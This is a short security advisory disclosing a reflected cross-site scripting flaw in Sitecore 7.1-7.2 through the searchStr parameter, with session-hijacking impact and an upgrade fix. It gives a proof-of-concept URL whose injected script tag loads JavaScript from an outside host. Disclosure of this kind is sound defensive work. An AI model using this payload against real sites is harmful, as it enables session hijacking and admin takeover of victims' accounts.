Sitecore 7.1-7.2 Cross Site Scripting Vulnerability Information -------------------- Author: Hamed Izadi Email: ("hamedizadi", "@", "gmail", ".com"); Name: XSS Vulnerability in Sitecore Affected Software : Sitecore.NET Affected Versions: v7.2-7.1 and possibly below Vendor Homepage : http://www.sitecore.net/ Vulnerability Type : Cross-site Scripting Severity : Important Description -------------------- By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in users session. This means that the malicious hacker can change the logged in users password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in this article, if a web application is vulnerable to cross-site scripting and the administrators session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application. Technical Details -------------------- Proof of Concept URLs for XSS in Sitecore 7.1-7.2: /Search-Results?searchStr= (searchStr - GET) XSS Payload : <script src=https://openbugbounty.org/1.js> Example: /Search-Results?searchStr=<script src=https://openbugbounty.org/1.js> Solution -------------------- Upgrade to newer version Credits & Authors -------------------- These issues have been discovered by Hamed Izadi